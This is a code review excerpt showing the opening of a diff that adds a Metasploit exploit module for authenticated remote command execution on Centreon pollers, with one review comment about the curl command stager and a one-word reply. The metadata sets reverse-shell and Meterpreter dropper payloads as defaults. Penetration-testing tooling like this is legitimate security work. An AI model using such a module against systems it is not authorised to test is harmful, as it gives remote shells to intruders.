modules/exploits/linux/http/centreon_pollers_auth_rce.rb

```diff
@@ -0,0 +1,311 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Centreon Poller Authenticated Remote Command Execution',
+      'Description' => %q{
+        TODO
+      },
+      'Author' => [
+        'Omri Baso', # discovery
+        'Fabien Aunay', # discovery
+        'mekhalleh (RAMELLA Sébastien)' # this module
+      ],
+      'References' => [
+        # TODO: waiting for CVE
+        ['EDB', '47977']
+      ],
+      'DisclosureDate' => '2020-01-27',
+      'License' => MSF_LICENSE,
+      'Platform' => ['linux', 'unix'],
+      'Arch' => [ARCH_CMD, ARCH_X64],
+      'Privileged' => true,
+      'Targets' => [
+        ['Reverse shell (In-Memory)',
+          'Platform' => 'unix',
+          'Type' => :cmd_unix,
+          'Arch' => ARCH_CMD,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/reverse_bash'
+          }
+        ],
+        ['Meterpreter (Dropper)',
+          'Platform' => 'linux',
+          'Type' => :meterpreter,
+          'Arch' => ARCH_X64,
+          'DefaultOptions' => {
+            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+            'CMDSTAGER::FLAVOR' => 'curl' # illegal characters: `~$^&"|'<>
```

Comment:
Probably best to set this in the target as well with `'CmdStagerFlavor' => :curl`.

Reply:
modified.